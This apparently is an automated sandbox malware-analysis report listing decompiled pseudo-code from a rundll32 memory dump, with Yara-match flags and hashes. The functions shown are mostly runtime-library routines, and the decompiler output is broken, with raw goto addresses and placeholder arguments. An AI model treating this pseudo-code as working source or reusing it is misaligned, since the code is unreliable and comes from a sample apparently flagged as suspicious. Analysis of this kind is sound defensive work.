                			E00000215215205C8328(void* __edi, void* __eflags, signed long long __rax, long long __rbx, void* __rcx, char _a8, void* _a16, long long _a24) {
				char _v48;
				long long _v56;
				void* __rsi;
				void* _t23;
				signed long long _t43;
				char _t44;
				intOrPtr _t45;
				intOrPtr* _t51;
				signed long long _t66;
				long long _t67;
				void* _t68;

				_t43 = __rax;
				_v56 = 0xfffffffe;
				_a24 = __rbx;
				_t68 = __rcx;
				E00000215215205D19DC(0,  &_a8);
				_t67 =  *0x20683558; // 0x0
				_a16 = _t67;
				_t23 = E00000215215205B7490(_t43, 0x20681928);
				_t66 = _t43;
				_t44 = _a8;
				if (_t66 -  *((intOrPtr*)(_t44 + 0x18)) >= 0) goto 0x205c837d;
				goto 0x205c837f;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x10)) + _t66 * 8)) != 0) goto 0x205c83fc;
				if ( *((intOrPtr*)(_t44 + 0x24)) == 0) goto 0x205c83a0;
				E00000215215205D6CC0(_t23);
				if (_t66 -  *((intOrPtr*)(_t44 + 0x18)) >= 0) goto 0x205c839e;
				_t45 =  *((intOrPtr*)(_t44 + 0x10));
				goto 0x205c83a0;
				if ( *((intOrPtr*)(_t45 + _t66 * 8)) != 0) goto 0x205c83fc;
				if (_t67 == 0) goto 0x205c83af;
				goto 0x205c83fc;
				E00000215215205C7890(0, __edi, _t67,  &_a16, _t68, _t67);
				if (_t45 != 0xffffffff) goto 0x205c83de;
				E00000215215205B7290( &_v48);
				E00000215215205F9940(_t67,  &_v48, 0x2066bb90, _t67);
				asm("int3");
				_t51 = _a16;
				 *0x20683558 = _t51;
				 *((intOrPtr*)( *_t51 + 8))();
				return E00000215215205D1A5C(E00000215215205D6C88(_t45, _t51),  &_a8);
			}














                0x215205c8328
                0x215205c8330
                0x215205c8339
                0x215205c833e
                0x215205c8348
                0x215205c834e
                0x215205c8355
                0x215205c8361
                0x215205c8366
                0x215205c8369
                0x215205c8371
                0x215205c837b
                0x215205c8382
                0x215205c8387
                0x215205c8389
                0x215205c8392
                0x215205c8394
                0x215205c839c
                0x215205c83a3
                0x215205c83a8
                0x215205c83ad
                0x215205c83b7
                0x215205c83c0
                0x215205c83c7
                0x215205c83d8
                0x215205c83dd
                0x215205c83de
                0x215205c83e3
                0x215205c83f0
                0x215205c8415

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$ExceptionLockit::_Lockit::~_$Facet_FileGetctypeHeaderRaiseRegisterThrow
                • String ID:
                • API String ID: 1301905473-0
                • Opcode ID: 0a87115b2a4541f1ea178fbd2bee01074b8c547a6047a49ec11fec3f19984c84
                • Instruction ID: a52e471360dee20c24e06d637b43eb04383898dfc1263ef89b822a90c83fddc0
                • Opcode Fuzzy Hash: 0a87115b2a4541f1ea178fbd2bee01074b8c547a6047a49ec11fec3f19984c84
                • Instruction Fuzzy Hash: 8C216737307EA0D1EA109B15D8582E96760EBE4FB0F5916A1DE6D07BEDDB38D446C300
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0000021520586110 Relevance: 6.1, APIs: 4, Instructions: 51COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 100%
                			E0000021521520586110(void* __rcx, void* __rdx) {

				if (__rcx != 0) goto 0x20586123;
				return 0;
			}



                0x2152058611a
                0x21520586122

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7d98254111e05adde69a3696cdcc994fb05bab6df1788f6c6edd5a136cdaeac6
                • Instruction ID: c8e8cf5c876b81901505cd98b29486cd11564bdadce3ee13924587c0762aad2d
                • Opcode Fuzzy Hash: 7d98254111e05adde69a3696cdcc994fb05bab6df1788f6c6edd5a136cdaeac6
                • Instruction Fuzzy Hash: F5F09032713E1291ED58F361945D3E921A01FE57B4F800BA0AF3E453DBEA7C80828700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205CF730 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: ConditionMask$InfoVerifyVersion
                • String ID:
                • API String ID: 2793162063-0
                • Opcode ID: 6b76180261ab68b82ba0a6f9839fba1abc185b397e756bb63c8d0d5e7f904022
                • Instruction ID: 24695c5187d7d78245b93a750a80e1c06c93bd88aa576703b83141c1d278c9d0
                • Opcode Fuzzy Hash: 6b76180261ab68b82ba0a6f9839fba1abc185b397e756bb63c8d0d5e7f904022
                • Instruction Fuzzy Hash: 20112632606A90C6E634CF21F8597DAB3A1FBD8B55F005219AE8A47B58EB3CD245CB40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205CB298 Relevance: 6.0, APIs: 4, Instructions: 49librarystringCOMMON
                Download Yara Rule
                C-Code - Quality: 26%
                			E00000215215205CB298(long long __rbx, void* __rcx, signed long long* __rdx, long long __rsi, long long _a24, long long _a32) {
				void* _v8;
				signed int _v24;
				char _v280;
				void* __rdi;
				struct HINSTANCE__* _t16;
				void* _t19;
				void* _t22;
				void* _t23;
				signed long long _t28;
				signed long long _t29;
				void* _t48;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_a24 = __rbx;
				_a32 = __rsi;
				_t28 =  *0x2067c720; // 0xca1645d940e
				_t29 = _t28 ^ _t53 - 0x00000130;
				_v24 = _t29;
				r8d = 0x100;
				E00000215215205F8EF0(_t19, 0, _t22, _t23,  &_v280, __rdx, _t48, _t56);
				lstrcpyA(??, ??);
				__imp__StrChrA();
				if (_t29 != 0) goto 0x205cb2fe;
				goto 0x205cb337;
				 *_t29 = 0;
				_t16 = LoadLibraryA(??);
				if (_t29 == 0) goto 0x205cb2fa;
				if ( *((char*)(_t29 + 1)) != 0x23) goto 0x205cb329;
				__imp__StrToIntA();
				 *__rdx = _t29;
				E00000215215205CB35C(0x2e, __rdx, _t16, _t58);
				return E00000215215205F59D0(_t19, _v24 ^ _t53 - 0x00000130, _t16, _t57);
			}


















                0x215205cb298
                0x215205cb29d
                0x215205cb2aa
                0x215205cb2b1
                0x215205cb2b4
                0x215205cb2c9
                0x215205cb2cf
                0x215205cb2dc
                0x215205cb2ec
                0x215205cb2f8
                0x215205cb2fc
                0x215205cb303
                0x215205cb309
                0x215205cb315
                0x215205cb31a
                0x215205cb320
                0x215205cb32c
                0x215205cb332
                0x215205cb35b

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: LibraryLoadlstrcpy
                • String ID:
                • API String ID: 304781146-0
                • Opcode ID: 0b49b04e65a30058fd5e78ef5794c424901968a41597d9151369477728d1a296
                • Instruction ID: 29f5666cd142d8905af5fa604c23394da4f11607ff3ef78a57d109c53222d6aa
                • Opcode Fuzzy Hash: 0b49b04e65a30058fd5e78ef5794c424901968a41597d9151369477728d1a296
                • Instruction Fuzzy Hash: 08110A37316E90C5FB319B11E8183D963A0FBECB94F9841659E8D46759EF3CC6058700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205C7480 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                Download Yara Rule
                C-Code - Quality: 43%
                			E00000215215205C7480(long long __rax, long long __rbx, void* __rcx, long long _a8) {
				long long _v24;
				long long _v32;
				short _v48;
				long long _v56;
				void* __rdi;
				long long _t32;
				long long _t41;
				void* _t42;

				_t33 = __rbx;
				_t32 = __rax;
				_v56 = 0xfffffffe;
				_a8 = __rbx;
				E00000215215205C7DF0(__rbx,  &_v48, __rcx, _t42);
				_t46 =  >=  ? _v48 :  &_v48;
				r8d = 0;
				CreateEventW(??, ??, ??, ??);
				 *0x206832c8 = _t32;
				if (_t32 != 0) goto 0x205c74d8;
				CloseHandle(??);
				goto 0x205c74f9;
				if (GetLastError() != 0xb7) goto 0x205c74fd;
				CloseHandle(??);
				 *0x206832c8 = _t41;
				goto 0x205c74ff;
				if (_v24 - 8 < 0) goto 0x205c751c;
				E0000021521520588F90(0, _t33, _v48, _t41, _t42, _v24 + 1,  >=  ? _v48 :  &_v48);
				_v24 = 7;
				_v32 = _t41;
				_v48 = 0;
				return 1;
			}











                0x215205c7480
                0x215205c7480
                0x215205c7486
                0x215205c748f
                0x215205c749c
                0x215205c74ad
                0x215205c74b3
                0x215205c74ba
                0x215205c74c0
                0x215205c74cc
                0x215205c74d0
                0x215205c74d6
                0x215205c74e3
                0x215205c74ec
                0x215205c74f2
                0x215205c74fb
                0x215205c7508
                0x215205c7517
                0x215205c751c
                0x215205c7525
                0x215205c752a
                0x215205c753c

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CloseHandle$ByteCharCreateErrorEventLastMultiWide
                • String ID:
                • API String ID: 1795745598-0
                • Opcode ID: 2521f5d9875d8b3ca812b0e1521cec3c50f7b132ce4204d89253beb7a7715d21
                • Instruction ID: 48993337dda84f90fc24a7253381826df56ea69212cacc205a71f3e15d3d0135
                • Opcode Fuzzy Hash: 2521f5d9875d8b3ca812b0e1521cec3c50f7b132ce4204d89253beb7a7715d21
                • Instruction Fuzzy Hash: 03118233206E64C2EB348B21F49879A7761FFE4764F640355EEA906AECCF3DD5458A00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535E8A30 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 53%
                			E00007FFA7FFA535E8A30(void* __rax, long long __rbx, void* __rcx, void* __rdx, void* __r9, long long _a8) {
				void* _t9;
				void* _t10;
				intOrPtr _t22;
				intOrPtr _t24;
				void* _t32;
				void* _t33;

				_t16 = __rax;
				_a8 = __rbx;
				GetLastError();
				_t22 =  *0x53754160; // 0xffffffff
				if (_t22 == 0xffffffff) goto 0x535e8a5a;
				E00007FFA7FFA535EDA58(_t10, _t22 - 0xffffffff, __rax, __rax, _t22);
				if (__rax != 0) goto 0x535e8a9b;
				asm("inc edi");
				asm("invalid");
				_t32 = __rax;
				if (__rax != 0) goto 0x535e8a7a;
				E00007FFA7FFA535E7E58(__rax, 0);
				goto 0x535e8ab6;
				_t24 =  *0x53754160; // 0xffffffff
				E00007FFA7FFA535EDAB0(_t10, __rax, __rax, __rax, _t24, __rax, _t33);
				if (__rax == 0) goto 0x535e8a73;
				E00007FFA7FFA535E879C(__rax, __rax);
				_t9 = E00007FFA7FFA535E7E58(_t16, 0);
				if (_t32 == 0) goto 0x535e8ab6;
				SetLastError(??);
				return _t9;
			}









                0x7ffa535e8a30
                0x7ffa535e8a30
                0x7ffa535e8a3a
                0x7ffa535e8a40
                0x7ffa535e8a4b
                0x7ffa535e8a4d
                0x7ffa535e8a58
                0x7ffa535e8a65
                0x7ffa535e8a67
                0x7ffa535e8a69
                0x7ffa535e8a6f
                0x7ffa535e8a73
                0x7ffa535e8a78
                0x7ffa535e8a7a
                0x7ffa535e8a83
                0x7ffa535e8a8d
                0x7ffa535e8a8f
                0x7ffa535e8a96
                0x7ffa535e8a9e
                0x7ffa535e8aa2
                0x7ffa535e8ab5

                APIs
                • GetLastError.KERNEL32(?,?,?,00007FFA535EE8F5,?,?,?,?,?,?,?,00007FFA535EEAAD), ref: 00007FFA535E8A3A
                • SetLastError.KERNEL32(?,?,?,00007FFA535EE8F5,?,?,?,?,?,?,?,00007FFA535EEAAD), ref: 00007FFA535E8AA2
                • SetLastError.KERNEL32(?,?,?,00007FFA535EE8F5,?,?,?,?,?,?,?,00007FFA535EEAAD), ref: 00007FFA535E8AB8
                • abort.LIBCMT ref: 00007FFA535E8ABE
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: ErrorLast$abort
                • String ID:
                • API String ID: 1447195878-0
                • Opcode ID: eec2c14e0966c9bea527e14d519690d7303d22ce24e7ab342e75b1017aa929f8
                • Instruction ID: 41d6bc8505a41966eb2bf847cbed8b94652b182d55b5b757ed1cf7b8d335e363
                • Opcode Fuzzy Hash: eec2c14e0966c9bea527e14d519690d7303d22ce24e7ab342e75b1017aa929f8
                • Instruction Fuzzy Hash: EE018C21F39F464EFA59A731A55513D119B5FC6BA0F0CE478ED2E227D2ED2CF8456200
                Uniqueness

                Uniqueness Score: -1.00%

                Function 000002152060C334 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 68%
                			E000002152152060C334(void* __rax, long long __rbx, void* __rcx, void* __rdx, void* __r9, long long _a8) {
				void* _t4;
				void* _t9;
				intOrPtr _t11;
				intOrPtr _t14;
				void* _t23;
				void* _t29;
				void* _t32;
				void* _t33;

				_t29 = __rdx;
				_t27 = __rcx;
				_t25 = __rbx;
				_t23 = __rax;
				_a8 = __rbx;
				GetLastError();
				_t11 =  *0x2067c964; // 0xffffffff
				if (_t11 == 0xffffffff) goto 0x2060c35e;
				_t4 = E000002152152060C9F4(_t11, _t11 - 0xffffffff, __rax, __rbx, __rcx);
				if (__rax != 0) goto 0x2060c39f;
				E0000021521520607C38(_t4, _t27, _t29);
				_t32 = _t23;
				if (_t23 != 0) goto 0x2060c37e;
				E000002152152060A780(_t23, _t27);
				goto 0x2060c3ba;
				_t14 =  *0x2067c964; // 0xffffffff
				if (E000002152152060CA4C(_t14, _t23, _t23, _t25, _t27, _t23, _t33) == 0) goto 0x2060c377;
				E000002152152060C0A0(_t32, _t23);
				_t9 = E000002152152060A780(_t23, _t32);
				if (_t32 == 0) goto 0x2060c3ba;
				SetLastError(??);
				return _t9;
			}











                0x2152060c334
                0x2152060c334
                0x2152060c334
                0x2152060c334
                0x2152060c334
                0x2152060c33e
                0x2152060c344
                0x2152060c34f
                0x2152060c351
                0x2152060c35c
                0x2152060c368
                0x2152060c36d
                0x2152060c373
                0x2152060c377
                0x2152060c37c
                0x2152060c37e
                0x2152060c391
                0x2152060c393
                0x2152060c39a
                0x2152060c3a2
                0x2152060c3a6
                0x2152060c3b9

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLast$abort
                • String ID:
                • API String ID: 1447195878-0
                • Opcode ID: 4db4a9de8d0ce589456f7ba887c1b0012caff3b3272c8948a9a49da0a163a458
                • Instruction ID: edc9813b875c49398ed102ee336c8417a683edd8f99005704735c1e67c69e396
                • Opcode Fuzzy Hash: 4db4a9de8d0ce589456f7ba887c1b0012caff3b3272c8948a9a49da0a163a458
                • Instruction Fuzzy Hash: 06018032383F20C6FA786370551D3EE1293AFE47A0F3485A89D1A027DEED38A4494200
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205BC1D0 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                Download Yara Rule
                C-Code - Quality: 65%
                			E00000215215205BC1D0(intOrPtr __rax, long long __rcx, void* __rdx, void* __r8, char _a8) {
				long long _v24;
				void* __rbx;
				intOrPtr _t9;
				intOrPtr _t20;
				void* _t35;
				intOrPtr _t40;
				intOrPtr _t41;

				_t20 = __rax;
				_a8 = __rcx;
				_v24 = 0xfffffffe;
				E00000215215205D6EBC(__rax,  *((intOrPtr*)(__rdx + 8)));
				 *0x206874b0 = __rax;
				if (__r8 == 0) goto 0x205bc281;
				_t40 =  *0x20681950; // 0x0
				if (_t40 != 0) goto 0x205bc251;
				E00000215215205D19DC(0,  &_a8);
				if ( *0x20681950 != 0) goto 0x205bc239;
				_t9 =  *0x20681908; // 0x0
				 *0x20681908 = _t9 + 1;
				 *0x20681950 = _t20;
				E00000215215205D1A5C(_t20,  &_a8);
				_t41 =  *0x20681950; // 0x0
				E00000215215205D48B8(__r8,  *0x206874b0, __r8, _t35, _t41);
				 *((intOrPtr*)( *0x206874b0 + 0x20)) = 0;
				return E00000215215205BB6E0( *0x206874b0, __r8,  *0x206874b0 + 0x28, "*", _t35);
			}










                0x215205bc1d0
                0x215205bc1d0
                0x215205bc1da
                0x215205bc1ea
                0x215205bc1ef
                0x215205bc1f9
                0x215205bc1ff
                0x215205bc209
                0x215205bc212
                0x215205bc220
                0x215205bc222
                0x215205bc22a
                0x215205bc232
                0x215205bc23e
                0x215205bc243
                0x215205bc257
                0x215205bc263
                0x215205bc28d

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Locimp::_std::locale::_$LocimpLockitstd::_$AddfacLocimp_Lockit::_Lockit::~_New_
                • String ID:
                • API String ID: 689645054-0
                • Opcode ID: 085596bfa8605262658fc5387fc4355da982d6cc03ef23043d0f51ddc70501df
                • Instruction ID: 07e7fffff662a0a6164c0633671077ee562131991ba858290093bd8f77e5fedf
                • Opcode Fuzzy Hash: 085596bfa8605262658fc5387fc4355da982d6cc03ef23043d0f51ddc70501df
                • Instruction Fuzzy Hash: B8118C77603E60C5EA20DB40E8583D567A4FFE5791F240296DD691B2AECF3CE84A8300
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0000021520589340 Relevance: 6.0, APIs: 4, Instructions: 36COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 100%
                			E0000021521520589340(void* __rdx) {

				if (__rdx != 0) goto 0x20589352;
				return 0;
			}



                0x21520589347
                0x21520589351

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8d92ff5e3a58a994a48adb4bec682cc1832eddf598bbbd8a3fc4526484e0e43a
                • Instruction ID: 547c777db776f92d2de2828a2fb85c797e8ad3c44ac616bc21c9f06db3ac111f
                • Opcode Fuzzy Hash: 8d92ff5e3a58a994a48adb4bec682cc1832eddf598bbbd8a3fc4526484e0e43a
                • Instruction Fuzzy Hash: D4F03072703D12D2ED18F355845E3EC21906BE97B4FD40BA4AF3E463C9EE6C85964300
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205BBE70 Relevance: 6.0, APIs: 4, Instructions: 36COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00000215215205BBE70(void* __rdx) {

				if (__rdx != 0) goto 0x205bbe82;
				return 0;
			}



                0x215205bbe77
                0x215205bbe81

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 39e2ae9d972135b19e8721c0c272893ea021ef14bacb15c7e938a42317222523
                • Instruction ID: ad07df5f6d6978b9d1854444b59d6cad811cc0be1c479762dc5fdabe08be51d1
                • Opcode Fuzzy Hash: 39e2ae9d972135b19e8721c0c272893ea021ef14bacb15c7e938a42317222523
                • Instruction Fuzzy Hash: 7AF03AB2B03D15D5FD1CB351849E3EC11A2AFAA7F0F9047A49B3E457DEADEC90914600
                Uniqueness

                Uniqueness Score: -1.00%

                Function 000002152060D440 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 245COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 83%
                			E000002152152060D440(void* __edx, void* __edi, void* __esp, long long __rbx, unsigned int* __rcx, signed long long __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9, void* __r10, char* _a40, intOrPtr _a48, signed int _a56, intOrPtr _a64, intOrPtr _a72) {
				void* _v24;
				intOrPtr _v32;
				intOrPtr _v48;
				intOrPtr _v56;
				long long _v72;
				intOrPtr _v80;
				intOrPtr _v88;
				intOrPtr _v96;
				long long _v104;
				void* _t62;
				void* _t65;
				void* _t69;
				char _t70;
				char _t73;
				signed char _t75;
				void* _t86;
				intOrPtr _t87;
				void* _t88;
				signed int _t96;
				void* _t124;
				intOrPtr* _t139;
				char* _t143;
				long long _t171;
				signed long long _t174;
				intOrPtr* _t178;
				char* _t179;
				signed long long _t184;
				void* _t185;
				signed long long _t192;
				signed long long _t194;
				signed long long _t197;
				signed long long _t201;
				intOrPtr* _t202;
				char* _t203;
				intOrPtr* _t204;
				char* _t205;
				void* _t206;
				char* _t208;
				void* _t209;
				char* _t210;
				char* _t211;
				char* _t212;
				char* _t213;
				unsigned int* _t216;
				void* _t219;
				intOrPtr* _t221;
				char* _t227;
				long long _t235;
				intOrPtr* _t239;
				char* _t241;

				_t171 = __rbx;
				_t139 = _t221;
				 *((long long*)(_t139 + 8)) = __rbx;
				 *((long long*)(_t139 + 0x10)) = __rbp;
				 *((long long*)(_t139 + 0x18)) = __rsi;
				 *((long long*)(_t139 + 0x20)) = __rdi;
				_push(_t235);
				r12d = 0;
				_t201 = __rdx;
				 *((intOrPtr*)(__rdx)) = r12b;
				_t216 = __rcx;
				_t174 = _t139 - 0x38;
				_t219 = __r8;
				_t86 =  <  ? r12d : _a48;
				E00000215215205FA5D4(_t139, __rbx, _t174, _a72);
				if (__r8 - _t171 + 0xb > 0) goto 0x2060d4ae;
				_t62 = E0000021521520603944(_t139);
				_t9 = _t235 + 0x22; // 0x22
				_t87 = _t9;
				 *_t139 = _t87;
				E00000215215205FAABC(_t62);
				goto 0x2060d769;
				if (( *__rcx >> 0x00000034 & _t174) != _t174) goto 0x2060d539;
				_v72 = _t235;
				_v80 = _a64;
				_t192 = _t201;
				_t143 = _a40;
				_v88 = r12b;
				_v96 = _t87;
				_v104 = _t143;
				_t65 = E000002152152060D7A0(_t171, __rcx, _t192, __rcx, __r8);
				_t88 = _t65;
				if (_t65 == 0) goto 0x2060d507;
				 *_t201 = r12b;
				goto 0x2060d769;
				strrchr(_t241);
				if (_t143 == 0) goto 0x2060d766;
				asm("sbb dl, dl");
				 *_t143 = 0xd0;
				 *((intOrPtr*)(_t143 + 3)) = r12b;
				goto 0x2060d766;
				if (( *_t216 & 0x00000000) == 0) goto 0x2060d54e;
				 *_t201 = 0x2d;
				_t202 = _t201 + 1;
				r15b = _a56;
				r10d = 0x30;
				asm("sbb edx, edx");
				if (( *_t216 & 0x00000000) != 0) goto 0x2060d5a1;
				 *_t202 = r10b;
				_t203 = _t202 + 1;
				asm("dec eax");
				goto 0x2060d5a7;
				 *_t203 = 0x31;
				_t204 = _t203 + 1;
				_t239 = _t204;
				_t205 = _t204 + 1;
				if (_t88 != 0) goto 0x2060d5b6;
				 *_t239 = r12b;
				goto 0x2060d5ca;
				 *_t239 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v48 + 0xf8))))));
				if (( *_t216 & 0xffffffff) <= 0) goto 0x2060d65d;
				r8d = r10w & 0xffffffff;
				if (_t88 <= 0) goto 0x2060d613;
				_t69 =  ~r15b + r10w;
				_t124 = _t69 - 0x39;
				if (_t124 <= 0) goto 0x2060d601;
				_t70 = _t69 + 0xffffffff000000e7;
				 *_t205 = _t70;
				_t206 = _t205 + 1;
				r8w = r8w + 0xfffc;
				if (_t124 >= 0) goto 0x2060d5e1;
				if (r8w < 0) goto 0x2060d65d;
				_t96 = r8b;
				if (_t70 - 8 <= 0) goto 0x2060d65d;
				_t28 = _t206 - 1; // 0x2
				_t178 = _t28;
				if (( *_t178 - 0x00000046 & 0x000000df) != 0) goto 0x2060d642;
				 *_t178 = r10b;
				_t179 = _t178 - 1;
				goto 0x2060d632;
				if (_t179 == _t239) goto 0x2060d65a;
				_t73 =  *_t179;
				if (_t73 != 0x39) goto 0x2060d654;
				 *_t179 = 0xffffffff00000121;
				goto 0x2060d65d;
				 *_t179 = _t73 + 1;
				goto 0x2060d65d;
				 *((char*)(_t179 - 1)) =  *((char*)(_t179 - 1)) + 1;
				if (_t88 - 1 <= 0) goto 0x2060d678;
				_t75 = E00000215215205F8EF0(_t96, r10b, __edi, __esp, _t206, _t192, _t206, _t171);
				r10d = 0x30;
				_t208 =  ==  ? _t239 : _t206 + _t171;
				r15b =  ~r15b;
				asm("sbb al, al");
				 *_t208 = (_t75 & 0x000000e0) + 0x70;
				if ( *_t239 - r12b < 0) goto 0x2060d6a6;
				 *((char*)(_t208 + 1)) = 0x2b;
				_t209 = _t208 + 2;
				goto 0x2060d6b1;
				 *((char*)(_t209 + 1)) = 0x2d;
				_t210 = _t209 + 2;
				_t184 =  ~(( *_t216 >> 0x34) - _t219);
				 *_t210 = r10b;
				_t227 = _t210;
				if (_t184 - 0x3e8 < 0) goto 0x2060d6f3;
				_t194 = (_t192 >> 7) + (_t192 >> 7 >> 0x3f);
				 *_t210 = __r10 + _t194;
				_t211 = _t210 + 1;
				_t185 = _t184 + _t194 * 0xfffffc18;
				if (_t211 != _t227) goto 0x2060d6f9;
				if (_t185 - 0x64 < 0) goto 0x2060d727;
				_t197 = (_t194 + _t185 >> 6) + (_t194 + _t185 >> 6 >> 0x3f);
				 *_t211 = __r10 + _t197;
				_t212 = _t211 + 1;
				if (_t212 != _t227) goto 0x2060d732;
				if (_t185 + _t197 * 0xffffff9c - 0xa < 0) goto 0x2060d75d;
				 *_t212 = __r10 + (_t197 >> 2) + (_t197 >> 2 >> 0x3f);
				_t213 = _t212 + 1;
				 *_t213 = (_t96 & 0x000007ff) + r10b;
				 *((intOrPtr*)(_t213 + 1)) = r12b;
				if (_v32 == r12b) goto 0x2060d77c;
				 *(_v56 + 0x3a8) =  *(_v56 + 0x3a8) & 0xfffffffd;
				return r12d;
			}





















































                0x2152060d440
                0x2152060d440
                0x2152060d443
                0x2152060d447
                0x2152060d44b
                0x2152060d44f
                0x2152060d453
                0x2152060d464
                0x2152060d467
                0x2152060d46a
                0x2152060d475
                0x2152060d47a
                0x2152060d481
                0x2152060d484
                0x2152060d488
                0x2152060d496
                0x2152060d498
                0x2152060d49d
                0x2152060d49d
                0x2152060d4a2
                0x2152060d4a4
                0x2152060d4a9
                0x2152060d4c0
                0x2152060d4cc
                0x2152060d4d4
                0x2152060d4d8
                0x2152060d4db
                0x2152060d4e6
                0x2152060d4eb
                0x2152060d4ef
                0x2152060d4f4
                0x2152060d4f9
                0x2152060d4fd
                0x2152060d4ff
                0x2152060d502
                0x2152060d50f
                0x2152060d517
                0x2152060d526
                0x2152060d52e
                0x2152060d530
                0x2152060d534
                0x2152060d546
                0x2152060d548
                0x2152060d54b
                0x2152060d54e
                0x2152060d55e
                0x2152060d57a
                0x2152060d585
                0x2152060d587
                0x2152060d58a
                0x2152060d596
                0x2152060d59f
                0x2152060d5a1
                0x2152060d5a4
                0x2152060d5a7
                0x2152060d5aa
                0x2152060d5af
                0x2152060d5b1
                0x2152060d5b4
                0x2152060d5c7
                0x2152060d5cd
                0x2152060d5d3
                0x2152060d5e3
                0x2152060d5f4
                0x2152060d5f8
                0x2152060d5fc
                0x2152060d5fe
                0x2152060d601
                0x2152060d605
                0x2152060d60c
                0x2152060d611
                0x2152060d617
                0x2152060d61c
                0x2152060d62c
                0x2152060d62e
                0x2152060d62e
                0x2152060d638
                0x2152060d63a
                0x2152060d63d
                0x2152060d640
                0x2152060d645
                0x2152060d647
                0x2152060d64b
                0x2152060d650
                0x2152060d652
                0x2152060d656
                0x2152060d658
                0x2152060d65a
                0x2152060d65f
                0x2152060d66a
                0x2152060d672
                0x2152060d67b
                0x2152060d67f
                0x2152060d682
                0x2152060d688
                0x2152060d69a
                0x2152060d69c
                0x2152060d6a0
                0x2152060d6a4
                0x2152060d6a6
                0x2152060d6aa
